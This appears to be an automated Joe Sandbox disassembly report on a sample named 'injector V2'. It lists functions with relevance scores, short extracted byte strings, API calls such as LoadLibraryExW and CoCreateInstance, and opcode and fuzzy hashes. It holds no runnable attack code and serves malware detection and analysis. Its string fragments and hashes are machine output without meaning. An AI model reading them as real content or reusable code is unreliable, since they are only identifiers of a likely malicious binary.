API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: !$Y$d$e$f$g$i$k$n$x$y$~
API String ID: 2832541153-1356265168
Opcode ID: cb58a34ceb3d3e6a40f86cc673dfcda2e0a7c772b173306605a6592191c1e6ba
Instruction ID: d3de8f92f8bbaa2aa1843ec74c75cfa727954b9f3f8777890a54f0e2c763787f
Opcode Fuzzy Hash: cb58a34ceb3d3e6a40f86cc673dfcda2e0a7c772b173306605a6592191c1e6ba
Instruction Fuzzy Hash: 5151AFB160C7818FD304AF78D48A36FBED19BD6318F09493EE4C586382D6BD95888767

Function 004096C0 Relevance: 19.2, Strings: 15, Instructions: 428COMMON

Download Yara Rule

Strings

DvEU, xrefs: 004096C1
!8 ', xrefs: 004096F8
rm, xrefs: 00409718
)?6~, xrefs: 004096D8
Je;/, xrefs: 004096E8
bk6, xrefs: 00409720
O:<;, xrefs: 004099DE
:S, xrefs: 00409811
O:<;, xrefs: 00409B0F
,89', xrefs: 004096F0
SP, xrefs: 00409890
, xrefs: 00409A60, 00409B4E
f\@W, xrefs: 00409770
f, xrefs: 00409897
.., xrefs: 004097F9

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: !8 '$)?6~$,89'$..$:S$DvEU$Je;/$O:<;$O:<;$SP$bk6$f$f\@W$rm$
API String ID: 0-1785535613
Opcode ID: 220c2e07d34b337964d7618d02432982ac70bec5f273066a8562a0f43d111e6d
Instruction ID: a12fd25bc03451607a5b161647c784aa9c11193ed6b1098f86614541a924438f
Opcode Fuzzy Hash: 220c2e07d34b337964d7618d02432982ac70bec5f273066a8562a0f43d111e6d
Instruction Fuzzy Hash: 85C124725083918BD321CF29849076BFBE1AFD2310F1946ADE4D55B382D7398D0ACB96

Function 0042F54D Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 400libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(335E3151,00000000,00000800), ref: 0042F7B6
LoadLibraryExW.KERNEL32(335E3151,00000000,00000800), ref: 0042FA46

Strings

8M:O, xrefs: 0042F9BD
B=_?, xrefs: 0042F995
Q1^3, xrefs: 0042F98B
H9S;, xrefs: 0042F99F
vA.C, xrefs: 0042F9B3
wEtG, xrefs: 0042F9A9

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: LibraryLoad
String ID: 8M:O$B=_?$H9S;$Q1^3$vA.C$wEtG
API String ID: 1029625771-732900325
Opcode ID: df12a9a3b11411e9bca1ba1a83d448eae64270d37feb6e3b2f3458e7730127e2
Instruction ID: b41059fe6161e1773b629013443bc6d481a0074fac93752a1bd1c4d58c6af018
Opcode Fuzzy Hash: df12a9a3b11411e9bca1ba1a83d448eae64270d37feb6e3b2f3458e7730127e2
Instruction Fuzzy Hash: 25D11971245B908BE7268F35C4607E3BFE1AF56304F5848ADC4EA9B342D77EA409CB54

Function 00427E47 Relevance: 14.2, Strings: 11, Instructions: 446COMMON

Download Yara Rule

Strings

9s:q, xrefs: 00427E7F
;w9u, xrefs: 00427E78
_], xrefs: 00427EBE
[Y, xrefs: 00427EC5
MJKH, xrefs: 004280E2
P, xrefs: 00427F49
7R, xrefs: 00427F3F
Sg/e, xrefs: 00427E5C
3c?a, xrefs: 00427E63
;w9u, xrefs: 00428080
<o0m, xrefs: 00427E6A

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: 3c?a$7R$9s:q$;w9u$;w9u$<o0m$MJKH$P$Sg/e$[Y$_]
API String ID: 0-2646023433
Opcode ID: 555a22c5120b3270df6d0f69afafc9e1b5306c30481c4fe12e379be4c0b9ab04
Instruction ID: e9620c69a6103c5ba334a126868c74336939e5a7c137a31b35142e4d59233b3d
Opcode Fuzzy Hash: 555a22c5120b3270df6d0f69afafc9e1b5306c30481c4fe12e379be4c0b9ab04
Instruction Fuzzy Hash: 65E1E2B8A01224CFDB14CF65E8C17AE7B71FF49304F6440ADE905AB366DB759802CB99

Function 00429230 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 466COMMON

Download Yara Rule

Strings

MJKH, xrefs: 0042978F
MJKH, xrefs: 004297E6
cL\R, xrefs: 004296C7
l\CV, xrefs: 004296DC
OtLw, xrefs: 004296EA

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: MJKH$MJKH$OtLw$cL\R$l\CV
API String ID: 0-4086322766
Opcode ID: dee320c6a975592afd9aa92b3fda8d9ed7069028afe873cd7105f2598da78ae5
Instruction ID: b8d79928466b81fa6e665cbc02488275f61c78a6c632bf3d7cfecef4fd16db41
Opcode Fuzzy Hash: dee320c6a975592afd9aa92b3fda8d9ed7069028afe873cd7105f2598da78ae5
Instruction Fuzzy Hash: D2E120B4E00268CBEF209FA5E8917AEBBB1FF46314F24456DD514AB381E7384941CF94

Function 00428B20 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 460COMMON

Download Yara Rule

Strings

MJKH, xrefs: 0042978F
MJKH, xrefs: 004297E6
cL\R, xrefs: 004296C7
l\CV, xrefs: 004296DC
OtLw, xrefs: 004296EA

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: MJKH$MJKH$OtLw$cL\R$l\CV
API String ID: 0-4086322766
Opcode ID: dcd2ba07b43bf613fdc276db8dc7784f7307c4723c6fed4f9b82d9feb7456dfd
Instruction ID: 9dd9f7735b15a068869410b895f305196ac924b8c67d20fc243daf02dcd64c4e
Opcode Fuzzy Hash: dcd2ba07b43bf613fdc276db8dc7784f7307c4723c6fed4f9b82d9feb7456dfd
Instruction Fuzzy Hash: C8E140B4E00268CBEF209FA5E8913AEBBB1FF46314F2445ADD514AB381D7384946CF94

Function 0041C03D Relevance: 8.0, Strings: 6, Instructions: 462COMMON

Download Yara Rule

Strings

4, xrefs: 0041C398
7654, xrefs: 0041C065
K7, xrefs: 0041C08C
7654, xrefs: 0041C345
`b]}, xrefs: 0041C270
7654, xrefs: 0041C505

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: InitializeThunk
String ID: 4$7654$7654$7654$K7$`b]}
API String ID: 2994545307-838136105
Opcode ID: 7a62161f380c079c7f23add8dcc83c5fbe0d84753278145194db94ece7c9b589
Instruction ID: 50b6da44d93c1792856bc455184b70f21b6a54fb13ff090464422bab90ea71ab
Opcode Fuzzy Hash: 7a62161f380c079c7f23add8dcc83c5fbe0d84753278145194db94ece7c9b589
Instruction Fuzzy Hash: 4DD13974648390DBE7218F24DCD0BBB7B91FB9A318F144A6DD1C997292C3399842CB5E

Function 004272DE Relevance: 7.9, Strings: 6, Instructions: 393COMMON

Download Yara Rule

Strings

& >&, xrefs: 00427733
QNLHU^_C, xrefs: 0042753F
'c*/, xrefs: 0042773A
465(, xrefs: 00427725
& >&, xrefs: 00427545
U^_C, xrefs: 00427710

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: & >&$& >&$'c*/$465($QNLHU^_C$U^_C
API String ID: 0-1240851877
Opcode ID: ed37147442375a8d0144c7d62f39d475980038a2695cb8c74a09f36bcfd02624
Instruction ID: fc6c38fce2dcb20bdca7f5051d2d8e7bc516b55391322947b2bf6a2bcf4e3e91
Opcode Fuzzy Hash: ed37147442375a8d0144c7d62f39d475980038a2695cb8c74a09f36bcfd02624
Instruction Fuzzy Hash: 9ED15832A086668BCB20CF68D4812BBFBF1EF15350B58462EC88597781D33CE946D7D9

Function 00424A6F Relevance: 5.9, Strings: 4, Instructions: 884COMMON

Download Yara Rule

Strings

7654, xrefs: 00425228
7654, xrefs: 00424AA5
6UB, xrefs: 00424C23
jk, xrefs: 00424CA9

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: 6UB$7654$7654$jk
API String ID: 0-3543152547
Opcode ID: 7412a323cc6b017f4f633e1f5475c913d35ed709256c0348101bad1e1c57648a
Instruction ID: 8317febcb0b717ea02dc42b19145c097d7e2226fcb24f2932e02abe06aebe43e
Opcode Fuzzy Hash: 7412a323cc6b017f4f633e1f5475c913d35ed709256c0348101bad1e1c57648a
Instruction Fuzzy Hash: 17525439608361CFD714CF29E89062BB7E1FB8A314F498A7DE89697391DB35D801CB85

Function 0040AF50 Relevance: 5.4, Strings: 4, Instructions: 398COMMON

Download Yara Rule

Strings

pq, xrefs: 0040B107
<, xrefs: 0040AF75
JKJI, xrefs: 0040B0AD
j, xrefs: 0040B344

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: <$JKJI$j$pq
API String ID: 0-2944771567
Opcode ID: ef9883c23492cdfec89b0b4084c54923a742b4da166ce1101963caae23d8f357
Instruction ID: 91f8302978429f6c97d05afd76f222b51d3979d4d5d34a8d7d2b287b969992a7
Opcode Fuzzy Hash: ef9883c23492cdfec89b0b4084c54923a742b4da166ce1101963caae23d8f357
Instruction Fuzzy Hash: D7C1D77110C3848BD314CF25849536FBBE1EBD2714F18896EE5E56B382C779890ACB9A

Function 00409430 Relevance: 5.3, Strings: 4, Instructions: 253COMMON

Download Yara Rule

Strings

DvEU, xrefs: 00409431
54, xrefs: 00409586
SUil, xrefs: 0040950F
amgl, xrefs: 00409517

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: 54$DvEU$SUil$amgl
API String ID: 0-685111924
Opcode ID: 21d76894d5700cfb92770cb0aa2744c22bb0ab713e9a071e0b9ef0354df58a4c
Instruction ID: 79af6e121721f5ffa45134ff6882e80b8ee20a3b93272787622080eb09e38dae
Opcode Fuzzy Hash: 21d76894d5700cfb92770cb0aa2744c22bb0ab713e9a071e0b9ef0354df58a4c
Instruction Fuzzy Hash: B461F23054D3D28AD3118F3594A075BFFE0AFA3344F184AADE4D45B392D37A8909C76A

Function 0041A45E Relevance: 4.2, Strings: 3, Instructions: 457COMMON

Download Yara Rule

Strings

$, xrefs: 0041CAA4
).)(, xrefs: 0041A492
$, xrefs: 0041A988

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: $$$$).)(
API String ID: 0-361422049
Opcode ID: 56527889b32f2f251d880d548777d62b8ab6d632cec1d2cb6246ff2a7ed2ecce
Instruction ID: f7dc44835eb6fbbfc1f5fa80d19c4fc6901d8282c6d76e5c18f1f4804d287ff4
Opcode Fuzzy Hash: 56527889b32f2f251d880d548777d62b8ab6d632cec1d2cb6246ff2a7ed2ecce
Instruction Fuzzy Hash: CB02ADB55093828BD3348F25C8997EBBBE1EF91314F19892DD4C98B392EB784445CB86

Function 0041B87A Relevance: 4.0, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

HI, xrefs: 0041B919
7654, xrefs: 0041BA75
gfff, xrefs: 0041B9C5

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: InitializeThunk
String ID: 7654$HI$gfff
API String ID: 2994545307-1303360943
Opcode ID: 604f32ed076cc958f383721a911946474ed089ff3aade1725ecc375025b14076
Instruction ID: af2d492fe1dedfc1f18e5172eaac6f7be7c7678aad385e989c90aa042a67c8ec
Opcode Fuzzy Hash: 604f32ed076cc958f383721a911946474ed089ff3aade1725ecc375025b14076
Instruction Fuzzy Hash: CB5123716142414BE3188B39DC517ABB7DAFBC6314F58863EE546CB3D1EB78C8428785

Function 0041D3F0 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

@N, xrefs: 0041D5C5
v?>1, xrefs: 0041D47B

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: @N$v?>1
API String ID: 0-1980814489
Opcode ID: 53a6c00c346269786558f198c2917e6592e25cf714322032e310186953531244
Instruction ID: b815ac515d5149a352201064e4ceb10a2ef09a794e6e19aa38af7178c6c82b42
Opcode Fuzzy Hash: 53a6c00c346269786558f198c2917e6592e25cf714322032e310186953531244
Instruction Fuzzy Hash: 7B41BEB04183919BC7108F25C861AABBBF1EF86368F049A5DE4D59B391E338C945CB5A

Function 0041CA0C Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

7654, xrefs: 0041CA25
7654, xrefs: 0041C995

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: 7654$7654
API String ID: 0-1888865020
Opcode ID: f5887b8fd7f6c5d2d24d687c39086d884df02f68e9c031eb7daa422e603e60e7
Instruction ID: d08d1943bad8525e3ca43d147dfc1494f48fe811f4815c66b09e7db94dc3b93d
Opcode Fuzzy Hash: f5887b8fd7f6c5d2d24d687c39086d884df02f68e9c031eb7daa422e603e60e7
Instruction Fuzzy Hash: 4D11BF742A82A08BE7698B2494D05BBA7A1BB96314F64362ED59217251C328D8438A8F

Function 00439C60 Relevance: 1.9, Strings: 1, Instructions: 607COMMON

Download Yara Rule

Strings

#, xrefs: 0043A538

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1983530799
Opcode ID: fea2b7f609e798078a47ea8125f5ba3705a828eb677d211e4f24c4966cf23b64
Instruction ID: 16983268d4ac3bd1b08c4ace5a67aee5d53ffbba90d8fd287a7bb8df6a2c2f8c
Opcode Fuzzy Hash: fea2b7f609e798078a47ea8125f5ba3705a828eb677d211e4f24c4966cf23b64
Instruction Fuzzy Hash: 07022736658211CBD7149F38EC5236B77E2EF8A301F0A987DD5C1872A0E77AC921C75A

Function 0043A170 Relevance: 1.8, Strings: 1, Instructions: 577COMMON

Download Yara Rule

Strings

#, xrefs: 0043A538

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1983530799
Opcode ID: 2c6470fbe8bfa2e03277857ab20cfc9f72d8c939d3a53ac69ef42ccbd73aedb0
Instruction ID: 17b37a8fecff2b217920f7b254b8c35aa4c1f4d6147ab754ba93e2967f30538c
Opcode Fuzzy Hash: 2c6470fbe8bfa2e03277857ab20cfc9f72d8c939d3a53ac69ef42ccbd73aedb0
Instruction Fuzzy Hash: 3A021636658211CBD7249F38EC5126B73E2FF9A311F0A987DD5C1872A4E77AC920C74A

Function 004241D0 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00444598,00000000,00000001,00444588), ref: 004241F9

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 97ddf2392ef8df18f2afb7d3c27a62fad871183f209af3ce23b934142a76bfcb
Instruction ID: 7378c28b204052c7e7ee2e60f1942579741da6e71b5d793b2542d77e0b6c9c6d
Opcode Fuzzy Hash: 97ddf2392ef8df18f2afb7d3c27a62fad871183f209af3ce23b934142a76bfcb
Instruction Fuzzy Hash: F951DEB07003209BDB20DB65EC86B6733B4EFC57A8F494559F9858B391E379E801C72A

Function 0041EC60 Relevance: 1.7, Strings: 1, Instructions: 413COMMON

Download Yara Rule

Strings

pz, xrefs: 0041ECFF

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: pz
API String ID: 0-1340104481
Opcode ID: 2eeadf915c5ad70cf9ad73630548bdbe5f84cdc73e4daeea92e4961975136536
Instruction ID: f7aedc96a884d33bce34398114fe9444267788ae15f08321c1de82ffabf57873
Opcode Fuzzy Hash: 2eeadf915c5ad70cf9ad73630548bdbe5f84cdc73e4daeea92e4961975136536
Instruction Fuzzy Hash: 0EB113745043018BC724DF29C8916ABB7F1FF81354F18892EE8D68B3A1E779D845CB96

Function 0042C9A0 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 0042CC88

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 0c7c25f7058e96ca7794fb020a11ecd90d2348f77ff94408ed96b73bb5e75ca2
Instruction ID: 9e104787e69459f5c2f95f267e37a844ca30ff533cd81c3114270e58663d6d2c
Opcode Fuzzy Hash: 0c7c25f7058e96ca7794fb020a11ecd90d2348f77ff94408ed96b73bb5e75ca2
Instruction Fuzzy Hash: 41C117B2B043205BD7248E25E4D176FB7E5AF84310F99892FE49587381D738E944C7C6

Function 0041CA5F Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

$, xrefs: 0041CAA4

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 22e01f9db302b1660e28f19de86abefc405e9c7941c06982d3b11d82ddf61ef3
Instruction ID: 7c8f7bd456b04a8827133ad97dd73c07524d727ed80991c4a2e54f5e9a2f2f30
Opcode Fuzzy Hash: 22e01f9db302b1660e28f19de86abefc405e9c7941c06982d3b11d82ddf61ef3
Instruction Fuzzy Hash: BC5102B56483818BD3348F24C8957FBB7E1EFD2304F19892DD4898B392EB785845C786

Function 0041B09F Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

$, xrefs: 0041CAA4

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 356a62af3435d0b03cd2d62982fa46bd9285116f465b64ace3ac3bab5886fd2e
Instruction ID: cb4176cf4c905493e5212b0a1ab631082346b3ce2c359dbd360c70e3a8f4fad7
Opcode Fuzzy Hash: 356a62af3435d0b03cd2d62982fa46bd9285116f465b64ace3ac3bab5886fd2e
Instruction Fuzzy Hash: C951E3B52483828BD3348F24C8957FBB7E1EFC6314F19892DD4898B292EB785845C786

Function 0040D46E Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

V, xrefs: 0040D47C

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 74205551ad661516210fe3a76944825f32e112498cf0897dd8502a1a635f172f
Instruction ID: 5485bd3761b63e485045982c35cd463daa20cb546944840e12c3ca4036bc9696
Opcode Fuzzy Hash: 74205551ad661516210fe3a76944825f32e112498cf0897dd8502a1a635f172f
Instruction Fuzzy Hash: C95106719083918BD724DF25C8617AFB7E6ABD6304F088C3ED4CAA7282DB394945875A

Function 0042BBA5 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

MJKH, xrefs: 0042BBEE

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: InitializeThunk
String ID: MJKH
API String ID: 2994545307-1589446790
Opcode ID: 4780d11b98806f7cc482536b4cf84856f644680c0fcac0e82e3a3fabe91ea1f2
Instruction ID: ce6050c1f6c7791fb0fba18a06f02e92d2d46cbe9c599be55e7e9f3d2f0f9d87
Opcode Fuzzy Hash: 4780d11b98806f7cc482536b4cf84856f644680c0fcac0e82e3a3fabe91ea1f2
Instruction Fuzzy Hash: 2331F835F50224CBEB184F56E85077F7721FB59320FA9412DC6262B691C77A5C028BDC

Function 0041C951 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

7654, xrefs: 0041C995

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID: InitializeThunk
String ID: 7654
API String ID: 2994545307-4024152101
Opcode ID: e98f1fa3bea65b3207480e233cad6034927cf44904c492b2f9f1acdd9596f37e
Instruction ID: c4104f41aabd91591706737d10641252dab86e3e7165d0dd011c765d44a29970
Opcode Fuzzy Hash: e98f1fa3bea65b3207480e233cad6034927cf44904c492b2f9f1acdd9596f37e
Instruction Fuzzy Hash: AE112CB46A4210DBE7194F24DCC19BA7752FB56318F64252FD24316291C3259D438BDF

Function 00407A50 Relevance: .8, Instructions: 828COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2533e274285e20ab901d8a1daddf8b004987537db9b03cd0f544795d639abf0
Instruction ID: fb3a1271c1dc2fb7141023adfb49e802e0cc5a45028e2a585a9e07336740357f
Opcode Fuzzy Hash: f2533e274285e20ab901d8a1daddf8b004987537db9b03cd0f544795d639abf0
Instruction Fuzzy Hash: 5852E531A087118BC725DF18D98026BB3E2FFD4314F29893ED9D6A7385D738A951CB4A

Function 00405E90 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4464a471b1101e6f0cfba2cf2749b35080e7e252119e3e9209d9fbdbcaa8a07
Instruction ID: 4593b49731f7ca398684b290bfa10eec681faba80c427aecb6f8d7b195a0bca1
Opcode Fuzzy Hash: c4464a471b1101e6f0cfba2cf2749b35080e7e252119e3e9209d9fbdbcaa8a07
Instruction Fuzzy Hash: 84F1C0352087418FD724CF29C88176BFBE2AFD9304F08882DE5C687791E639E944CB96

Function 00423050 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7317a98eba82fb453c5ba973ba21e2c3c7a0863b83d9ac4534c15e29104edf6
Instruction ID: 1c14b848e7c9f2a2998ca82555c1ab2509ad684e0fb7e1444311c53dce40a25e
Opcode Fuzzy Hash: f7317a98eba82fb453c5ba973ba21e2c3c7a0863b83d9ac4534c15e29104edf6
Instruction Fuzzy Hash: F5B1F0B06083208BD3249F24C85272BB7F1FFA6355F48895DE4D58B3A4E77D9A01CB96

Function 00429055 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cccd2d485aed7df0d3faf96fd8aa420d34ed02227223fbf47cbdf68679cada3
Instruction ID: 35b2549aa90c9f90b5b2958ce822cafdd3ddce8f62e44973523cceac975c7c38
Opcode Fuzzy Hash: 8cccd2d485aed7df0d3faf96fd8aa420d34ed02227223fbf47cbdf68679cada3
Instruction Fuzzy Hash: C8915675A00161CFCB008F68D8816FFBBB2AF9A304F59456ED495A7342DA3D9806CB68

Function 0042BDC6 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2e678118abe9fdde322b43f71ab0c5b0c6e5290fb7c17ae770a54029a3f637
Instruction ID: 0eaa56c5db7436f8190d932b4663b9047ab687343c802e24c7619c06c9609538
Opcode Fuzzy Hash: 1e2e678118abe9fdde322b43f71ab0c5b0c6e5290fb7c17ae770a54029a3f637
Instruction Fuzzy Hash: 7F7134F5A003119FCB14CF29C9807AA7FB2FB85310F1986A8D854AF396D7B48906CBD5

Function 0042A299 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f1bcbca8f73a82adf17fc8ec1e627ee7f8d428773746b2fca543abff7096b0
Instruction ID: 8481db755cd8ea04d2d51c3e3e0ef64bc0051189ca126cf83d8fb17c3486ae24
Opcode Fuzzy Hash: d7f1bcbca8f73a82adf17fc8ec1e627ee7f8d428773746b2fca543abff7096b0
Instruction Fuzzy Hash: 3951D572B11D0247C75CCA2DDC6267BB293ABC5320B5D832EDA27D73C9DF3498128284

Function 0042A24C Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa0bba6222a3d435aec5eb64508d0d06dea4e146d79f39eb269294be122f10e2
Instruction ID: b7ecc1b1e8e254b4b41e0523eaffba5e087f870cf2997bc25913639950a96f77
Opcode Fuzzy Hash: aa0bba6222a3d435aec5eb64508d0d06dea4e146d79f39eb269294be122f10e2
Instruction Fuzzy Hash: FD51D272B11D1147D75C8A3D9C2277AB293ABC5324F5C832EEA27DB3D5DE3898128684

Function 00439F60 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_injector V2.jbxd

Similarity

API ID:
String ID:
API String ID:
